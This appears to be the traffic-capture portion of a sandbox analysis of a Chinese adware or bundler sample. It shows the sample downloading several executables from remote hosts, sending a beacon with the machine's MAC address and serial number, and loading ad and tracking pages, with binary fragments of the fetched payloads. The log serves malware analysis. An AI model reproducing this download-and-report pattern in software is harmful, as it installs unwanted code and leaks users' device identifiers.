...y.5..7.W].n.:.0.......k../6.W..YqR:...|."9...$>^..d..W.Nh.D.>.$s..ORJ.M..kA...-....P.^.Fu.........|.__u{..~......U.JZ..N.c.i..&..'t..n.,9..b.h.f{P..}....E..c)........T%A.`.....T...5.......Ei....[.....s..?...M.L.).....1......gjI0.=...Sz...;..H.S.o. 0'............~.%..&..n..F..%..R...).x....E..5....Vw.......3;j<{7.5.F.....kT..F.....M....^...V.q......3.{.yXV.;..y.?..r. 4"......!3J.......,~.M{.....{.....O...f.....M.9M%..~LY..3H.S..R.i[FN..)...P..8{].w....@-.pP!.aOE.....N E..c.x%.2f..C.|....".b|..55........D.E........w.`$.`~5...A..3.5..9r..o..4._7.v.....x.T..(.(.\.4...".......t.......t...V..<...6u..h@.NiQ......O....'......Q...7.7M......6....p...8.{6T^"....B$...........S?..1.V....x.l..j.q19...w..O....;y!Q....H..M)qn.o...&......=.tQ...$:.......)...|.b..u)|...g....{..Z.....C..$.zd....&.4... ..?!!..6.4,.?... T.u..}./..^.O.>...Gy...[.........B......:..A.......ba..%n.3.o.vz..o.5..k....q.n...HE.(...}[.......I<g...2...%UP........}.c..............`.U(dT....w.1.b...\C.f%.,.A.F....v.#.W/...q.F..Zu2...7"..I.....V ..AB.._2T...f.....'&.~d..`..X;..~4...$....8V.._.........Sj.g..<W.BC...T.Ca.MD.w.Y.=......,3..g_.........p.......z).B`.kL..n]{%#o.[uC,....v......l...\ ..5.d..L.e...h..../..E.............X.G..0qzN.0..z...S.....nr.p...."U.'.....2.B...]...o..W.V...h...~..}.^f..x..h.............."X)V....o..CX.m.M.t.x.E..?...P$8.sIk...!"H...U=`.........xR......9.,o.....P8..{...o.NND...~..l.i....e......n.....&h{..=.h^r|g..v.0H...P.M.=\..t.N..i...4.n...0.c...i.8.."~q.".IyZ.=1...e.=....y.......G.IX.r\p......$).#..N..P.0G
<<
<<< skipped >>>
GET /slience/fhsli_6_12001.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: software.fhrlw.cn
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 335364
Content-Type: application/octet-stream
Last-Modified: Wed, 28 May 2014 05:49:52 GMT
Accept-Ranges: bytes
ETag: "261b13a5387acf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:31 GMT
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u...u...u.......w...u...........d.......|.......t...Richu...................PE..L.....UH.................b....... ..o5............@..........................0...........................................................@...........................................................................................................text...x`.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata...@...............................rsrc....@.......B..................@..@................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......D..H.P.u..u..u...T.@..X...SV.5..D..E.WP.u...X.@..e...E..E.P.u...\.@..}..e..9}...D.@........FP.VT........ M............U....M....3...3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...e....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.RD.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$....D...Si.. ..VW.T.....tO.q.3.;5..D.sB..i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5..D.r._
<<
<<< skipped >>>
GET /cs/jsfile/js/c.js HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: images.sohu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Server: FSS
Date: Sat, 14 Jun 2014 08:25:51 GMT
Last-Modified: Mon, 26 May 2014 07:18:20 GMT
Expires: Sat, 14 Jun 2014 09:25:51 GMT
Cache-Control: max-age=3600
Content-Encoding: gzip
FSS-Cache: HIT from 15041145.21594755.22842845
43a.............}.w.8.._Iu.z.Zq.g.;JO....L.6......Y.[.,9..........).I;..o....... .. ...N.....,.$.....-....[;..T$i#=X.n.&.n._C....7.o..&....tl.....2......4.|].<a@.<Y...:i-...s..p...q..y..Gyzw.....u...u..a<.....S.7..4.8....i6G..t...sl#Z..AB=[.jj.......NF9....0;.O.._g..$M..e.p...!%.}.4......5.O0m..#H|?..nn.k..y.y.....mS.~.'.n.j.K'...Wi..j...}...B.(...:.m..N..9.A..$.u...Y.....;?..c?-%R..._$I.;.q...*.w...-y.H...i.....}qI. ..Q.....`n'...'.t.8....&.^.....O....'..Kc#.k...m......jA:..p.....i.'. ...:Q............g8.......?...O.;}a ..:.......y.%./.%.>a.DU...OIr..j.....1.Z.4.r.`.....{R~.2.:Q..o...k.gnF../...3@..y^].Y.\$..|-g...H..WF.%....T..(..g/.s.v....zd.&.$....i..Er.h0i.....F..&........^....}.R...."t5.x.m..$...;....%?..U...R...^Co..[.U6....I..%(.'a.....O.I)%..J..%...{...)......2{~quI...z.$3..$...t.....L.G&1.xF...*~*.........UF....K..3.....F..D.... ..O.....e.....H].1..L$P..v...OL.O*..~=..h...4KM..F...w.....m.....or.YV...V..Rw..H1..........;..6..t<gb.h.P.f.\..0.....U3..g..(.m...&-.0...F...U....'...M.>..'>Z..G1.4...."&b........v........A...R*..0c0..<.C...K.@.......F.q......X......X..32de..W......4.*.b}.......&....d..b..#/.>*....U"..I.....Y2.J5...-@C..$r.....`V...5.-5r.....".70.X.d..T....< j..[^..N.hh....@...i.......?.......f........$.s....uy).q.L./0Y...*.8......%.5s.=Rj.D*..2..R...K[<...t.n...4a.....E.............j..(.i.8.=..a....<...i&....nY-K3y..%.G..&7.W...w..E..;.g.....3..V.g..;........O.Opz.bk....Z4.Y.AOhR..B.|....K....:t>....HV..k..~...>.,s=f....lH.>g....4.....n...*..b...
<<
<<< skipped >>>
GET /client/picchange.css HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.fhrlw.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 584
Content-Type: text/css
Last-Modified: Thu, 08 May 2014 04:11:16 GMT
Accept-Ranges: bytes
ETag: "fddeeb8e736acf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:24 GMT
html, body, div, dl, dt, dd, ul, ol, li, h1, h2, h3, h4, h5, h6, pre, form, fieldset, input, textarea, p, blockquote, th, td {.. margin: 0;.. padding: 0;..}..ol, ul {.. list-style: none outside none;..}...main{position: relative; width:340px;height: 60px;}...main div{width:100%;overflow:hidden;}...main .adlist{display:none;}...main .sel{display:block;}...showList{position:absolute;bottom:2px;right:0px;}...showList li{float:left;width:8px;height:8px;background:#eaeaea;color:#eaeaea;margin-right:5px;font-size:0;}...showList li.special{background:#4384da;color:#4384da;}HTTP/1.1 200 OK..Content-Length: 584..Content-Type: text/css..Last-Modified: Thu, 08 May 2014 04:11:16 GMT..Accept-Ranges: bytes..ETag: "fddeeb8e736acf1:4d6"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Sat, 14 Jun 2014 09:01:24 GMT..html, body, div, dl, dt, dd, ul, ol, li, h1, h2, h3, h4, h5, h6, pre, form, fieldset, input, textarea, p, blockquote, th, td {.. margin: 0;.. padding: 0;..}..ol, ul {.. list-style: none outside none;..}...main{position: relative; width:340px;height: 60px;}...main div{width:100%;overflow:hidden;}...main .adlist{display:none;}...main .sel{display:block;}...showList{position:absolute;bottom:2px;right:0px;}...showList li{float:left;width:8px;height:8px;background:#eaeaea;color:#eaeaea;margin-right:5px;font-size:0;}...showList li.special{background:#4384da;color:#4384da;}....
<<
<<< skipped >>>
GET //js/picchange.js HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.fhrlw.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 908
Content-Type: application/x-javascript
Last-Modified: Thu, 08 May 2014 03:52:46 GMT
Accept-Ranges: bytes
ETag: "eeb3d4f8706acf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:31 GMT
var thisIndex=0;..var bannerLength = $('.main .adlist').length;..for(i=0; i<bannerLength; i ){...$('.showList li').eq(i).text(i 1);..}..function ChangePic()..{...indexobj = $('.showList li').eq(thisIndex);...$('.showList li').removeClass('special');...indexobj.toggleClass('special');...obj = $('.main .adlist').eq(thisIndex);...$('.main div').removeClass('sel');...obj.addClass('sel');......thisIndex = thisIndex 1>=bannerLength? 0 : thisIndex 1;..}.. ..$('.main .adlist').hover(function(){...window.clearInterval(timer);..},function(){...timer = window.setInterval( "ChangePic()" , 5000 );..})..$('.showList li').hover(function(){...window.clearInterval(timer);...thisIndex = parseInt(this.innerHTML) - 1;...ChangePic();..},function(){...timer = window.setInterval( "ChangePic()" , 5000 );..})....$(function(){... ...timer = window.setInterval( "ChangePic()" , 5000 );...ChangePic();..})HTTP/1.1 200 OK..Content-Length: 908..Content-Type: application/x-javascript..Last-Modified: Thu, 08 May 2014 03:52:46 GMT..Accept-Ranges: bytes..ETag: "eeb3d4f8706acf1:4d6"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Sat, 14 Jun 2014 09:01:31 GMT..var thisIndex=0;..var bannerLength = $('.main .adlist').length;..for(i=0; i<bannerLength; i ){...$('.showList li').eq(i).text(i 1);..}..function ChangePic()..{...indexobj = $('.showList li').eq(thisIndex);...$('.showList li').removeClass('special');...indexobj.toggleClass('special');...obj = $('.main .adlist').eq(thisIndex);...$('.main div').removeClass('sel');...
<<
<<< skipped >>>
GET /Api/SendClickData.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&date=2014-06-14&clickcount1=0&clickcount2=0&clickcount3=0&clickcount4=0 HTTP/1.1
User-Agent: FhCalendar
Host: client.fhrlw.com
HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 13
{"errno":"1"}....
GET /ad/fixad.html?id=9995 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: client.fhrlw.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1737
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 14 Jun 2014 09:01:23 GMT
..<style type="text/css">.. body.. {.. margin: 0;.. border: 0;.. }..</style>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head><title>..</title><meta http-equiv="refresh" content="600" />.. <link href="hXXp://img.fhrlw.com/client/picchange.css".. rel="stylesheet" type="text/css" />.. .. <script src="hXXp://img.fhrlw.com/js/jquery-1.3.2.min.js".. type="text/javascript"></script>.. <script>.. window.onerror = function() { return true; };.. $(document).ready(function() {.. $(document).bind("contextmenu", function(e) {.. return false;.. });.. });.. </script>..</head>..<body scroll="no">.. <div class="main">.. <div class="adlist sel"><script type="text/javascript">.var sogou_ad_id=341269;.var sogou_ad_height=60;.var sogou_ad_width=460;.</script>.<script type=text/javascript src=hXXp://images.sohu.com/cs/jsfile/js/c.js></script></div><div class="adlist "><script type="text/javascript">.var sogou_ad_id=341269;.var sogou_ad_height=60;.var sogou_ad_width=460;.</script>.<script type=text/javascript src=hXXp://images.sohu.com/cs/jsfile/js/c.js></script></div><div class="adlist "><script type="text/javascript">.var sogou_ad_id=3412
<<
<<< skipped >>>
GET /qi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dspcm.brand.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0..HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 09:00:44 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: YYID =..a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0......
GET /pixel?tid=E0&ver=1&extendata= HTTP/1.1
Accept: */*
Referer: hXXp://dspcm.brand.sogou.com/qi
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; YYID=
Connection: Keep-Alive
Host: dspcm.brand.sogou.com
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
6..hello...0..HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 09:00:46 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: YYID =..6..hello...0......
GET /qi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dspcm.brand.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; YYID=
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0..HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 09:00:47 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: YYID =..a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0......
GET /qi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dspcm.brand.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=vLpiSyllll2FXlDElllllVntR8DlllllZYr1iZllllGlllllRklll5@@@@@@@@@@; YYID=
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0..HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 09:00:47 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: YYID =..a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0..
GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/plain
Content-Length: 160
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:44 2014
X-XSS-Protection: 0
SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,."m":"MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"1985823318692344632".}});....
GET /ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/html
Content-Length: 7434
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:44 GMT; domain=.sogou.com
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:44 2014
X-XSS-Protection: 0
<html>.<head>.<title></title>.<style>.<!--.body{margin:0;background-color:transparent;}..sogou{width:460px; height:60px;position:relative;overflow:hidden;}.a.logo{display:block;height:18px;width:26px;text-align:justify;letter-spacing:20px;text-decoration:none;overflow:hidden;cursor:default;position:absolute;bottom:0px;right:0px;}..sogou a.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_background:none;}..sogou a.logo:hover{width:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left top;_background:none;}..sogou a.normal{}.-->.</style>.</head>..<body>.<iframe id="tanxcmiframe" width="0" height="0" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></iframe>.<script type="text/javascript">.var iheight = "60";.var fsize = iheight;.if (iheight >= 30).{. fsize = 30;.}.var mt_preview="0";.if (mt_preview == 1).{.. var height0=60;.. var width0=460;.. if ((width0==120 && height0==600) || (width0==160 && height0==600) || (width0==200 && height0==200) || (width0==250 && height0==250) || (width0==300 && height0==250) || (width0==336 && height0==300) ||
<<
<<< skipped >>>
GET /xxdd_165.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: ddl.9yfc.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.12
Date: Sat, 14 Jun 2014 08:56:32 GMT
Content-Type: application/octet-stream
Content-Length: 4409157
Last-Modified: Sat, 31 May 2014 06:56:10 GMT
Connection: keep-alive
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................................................................s...........8...........................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......@...........................rsrc....8.......:...t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=204800-409600
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 204800-409600/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:48 GMT
.gW5#.........1L.fM..TgI..._..(..a.`.. kf........M3....{.K.:\.>....x....a..e....!.......N=.!.G.d....z..".....aY.=....9...}k$.....=e.....r.W|.C.Qg..."....sA'...P.RR.....!....9ei.l.....N.....OR>.//..0.=..U.I.e.......p....*..U......L.2[...q........B.....l.2.mj3^.k.'3..C......IF.r7.$(F\........8/..|...l..((.;w.)....."q.?...rmG......[(@b.T,Tvy.A.\.ZJZ...=..#....c.U!X..m.#o.. ..............V....=......3..~.....$.1..K$B6.petx..!.....z.~6G7..^...l.....?ccM....a.E.........7...........tTJ."..%O.........._Lnv....Q-H..0....]..NcQ..'.e..`...7.7.......\...>....|.D.K/:>...a...M.......X.z.q....O..[..GP_i....p....l(.\7....<(..];.. ....\y.F..n?...3..a.....Az..Q...e.z?8.,%.,8.;....I..3......_.,.sZ..d.../U.....Y1..N.Mu.a.....T....$.B........s....e.:.?...Mmw. .e}..c.........C....>.....7...-K.^..>..]...kO....;B.D*..._o..9{..{....x..V ..2.C..e|.....a"C[......S{.......Z......0X.Mff.G.~]%..&C0.||=3;.Zd....q..o.I.....y{.9v...Jl..kt~.$5ON....3TT.x....b....<....$.b,.G.|r..../.....i.. ......q$P.P.g#.....0.}..<..GjFx.......QhEr/.f.D..}....*.Uu...W^E..)."....gx.VGa.k....4.d~.A|....a.....;...B1.....u.....?....}B...{.n..%.`.\...6l...;V.. .]......w.k.=V......VY"...}.L.....ee......n..Dn.B..[.....|.".............t..x.mF.#P...._.V.?...I.M;bq.U..{....(..{..P.7.V...k..k...%...gg..p..-...\$.c$....J..K.I.s.....=e.8v.....Y..R....U....%w....{.w......X..uKqCT........e..T<..8.........EB".....@.....Q.up.[..K..M..a.7..5h.. .t~D.x. .~>b)S5..:..`.....7...Z&.C.....@P...*<7{H*..d...E*n.....f...x.E)..B.....;;..f..I.j.....k@e..
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:15 GMT
